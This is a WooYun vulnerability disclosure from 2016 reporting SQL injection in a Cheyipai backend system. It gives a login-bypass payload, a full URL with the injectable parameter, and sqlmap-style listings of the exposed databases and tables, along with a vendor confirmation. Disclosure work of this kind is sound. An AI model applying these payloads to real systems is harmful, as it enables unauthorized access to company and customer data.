当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0187159

漏洞标题:车易拍某系统多处SQL注入

相关厂商:cheyipai.com

漏洞作者: niliu

提交时间:2016-03-21 07:33

修复时间:2016-05-05 16:34

公开时间:2016-05-05 16:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-21: 细节已通知厂商并且等待厂商处理中
2016-03-21: 厂商已经确认,细节仅向厂商公开
2016-03-31: 细节向核心白帽子及相关领域专家公开
2016-04-10: 细节向普通白帽子公开
2016-04-20: 细节向实习白帽子公开
2016-05-05: 细节向公众公开

简要描述:

-,-

详细说明:

http://xing.268v.com
一个业务后台,首先登陆接口存在注入
可直接进入
admin' or '1'='1

QQ20160320-2.png


2.
http://xing.268v.com/pages/forms/SaleBill.aspx?bid=764&wfno=SG108&bizid=764&carid=536&biztype=0&currentSubWfNo=&wfnod=SG107&isarea=
wfno 参数注入

available databases [12]:                                                      
[*] AuthenticateCar
[*] BugTracker
[*] cheyipaidb
[*] df268vdb
[*] ErrorLog
[*] master
[*] model
[*] msdb
[*] SMS
[*] tempdb
[*] xing
[*] YTUCMSDB


12个数据库

QQ20160320-0.png


漏洞证明:

Database: xing                                                                 
[87 tables]
+---------------------------+
| Area_Info |
| CR_PlateCode |
| CarImport |
| CarManagerLog |
| Car_Complaints |
| Car_Favorite |
| Car_InfoFor268v |
| Car_Info_t |
| Car_Info_t |
| Car_ReportFor268v |
| Car_Report_t |
| Car_Tag_Mapping |
| Department |
| Dict_ProvinceCity |
| Index_Ad |
| Index_RecommendBrand |
| Index_RecommendBrand |
| Index_RecommendCar |
| Index_Subject |
| Manager_Department |
| Manager_PageList |
| Manager_Role_Permission |
| Manager_Role_Permission |
| Manager_User_Admin |
| Market_Info |
| Message_Info |
| Model_CMBasicParaInfo |
| Model_CarBrand |
| Model_CarCountry |
| Model_CarMainSeries |
| Model_CarManufacturer |
| Model_CarModel |
| Model_CarSeries |
| Model_SMSSend_Record |
| Model_SMSSend_Record |
| OperationLog |
| QueuedEmail |
| Recommend_Tag_Mapping |
| Region_Info |
| Reservation_Info |
| Subject_Tag_Mapping |
| T_BCM_ProvinceCity |
| T_SCM_CMBasicParaInfo |
| T_SCM_CarBrand |
| T_SCM_CarCountry |
| T_SCM_CarMainSeries |
| T_SCM_CarManufacturer |
| T_SCM_CarModel |
| T_SCM_CarSeries |
| Tag_Info |
| User_Buyers |
| User_JoinMe |
| User_Vip_CarAddress |
| User_Vip_CarAddress |
| User_Vip_PaymentInfo |
| V_Inspector_CYPStandard |
| V_Reports_CYPStandard |
| V_Reports_Yashi |
| ValidCodeModel |
| View_ManufacturerSeries |
| View_RecommendBrand |
| View_SearchCar |
| View_SearchSubjectCar |
| _CR_BasOfficeAreas |
| _CR_BasParameterInfo |
| _CR_EnterPrise |
| _CR_InspeOfficeInfo |
| _CR_Inspector |
| _CR_Reports |
| _Car_Brand |
| _Car_Image |
| _Car_Models |
| _Car_SeriesGroup |
| _Car_SeriesGroup |
| _Car_Type |
| _T_SCM_CMBasicParaInfo |
| _T_SCM_CarBrand |
| _T_SCM_CarCountry |
| _T_SCM_CarMainSeries |
| _T_SCM_CarManufacturer |
| _T_SCM_CarModel |
| _T_SCM_CarSeries |
| car_report_bak1030 |
| car_report_bak1030 |
| sysdiagrams |
| tb_EnterPrise_CYPStandard |
| tmp0928 |
+---------------------------+


修复方案:

加强过滤

版权声明:转载请注明来源 niliu@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-03-21 16:34

厂商回复:

漏洞已确认,感谢关注

最新状态:

暂无


漏洞评价:

评价